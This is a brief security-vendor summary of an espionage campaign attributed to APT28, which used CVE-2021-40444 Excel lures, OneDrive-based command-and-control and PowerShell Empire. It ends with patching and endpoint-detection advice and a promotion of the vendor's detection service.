A new multi-stage espionage campaign has been discovered that is targeting high-ranking government officials and individuals in the defense industry in Western Asia. First signs of activity from this campaign were seen as far back as June of 2021, with more victims reporting the attack in September and October of the same year.
This campaign is unique in the fact that it uses Microsoft OneDrive as its command-and-control server, relying on the synchronization feature of the utility to execute encrypted commands on the victim system. The initial infection vector for this campaign is via Microsoft Excel files containing an exploit for the MSHTML remote code execution vulnerability tracked as CVE-2021-40444. Once this exploit is launched on a vulnerable system, the malware executes another binary that acts as the downloader for the OneDrive stage of the malware, which has been dubbed Graphite. From there, the malware has been seen downloading and executing PowerShell Empire as its final payload, to be used for post-exploitation activities.
Due to how the infrastructure, malware, and operation has been set up, it is believed that the threat actor behind this campaign is the Russia-based APT28 group, also known as Fancy Bear. This threat group has been linked with numerous high-profile campaigns in recent years, including attacks related to the 2016 U.S. presidential elections.
It is highly recommended to properly patch and maintain systems to prevent vulnerabilities from being exploited on them. This is particularly true in the case of vulnerabilities like CVE-2021-40444, which are considered critical due to the low complexity of execution and the high value they provide when exploited. Likewise, it is important to have and maintain a good endpoint detection and response (EDR) solution with proper logging mechanisms. Tools like PowerShell Empire are well-known and heavily signatured, making it easier to prevent such an attack with a good endpoint solution. Likewise, appropriate logging can help detect behaviors of malware and malicious tools by looking for anomalous process and network activity. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these types of detection needs.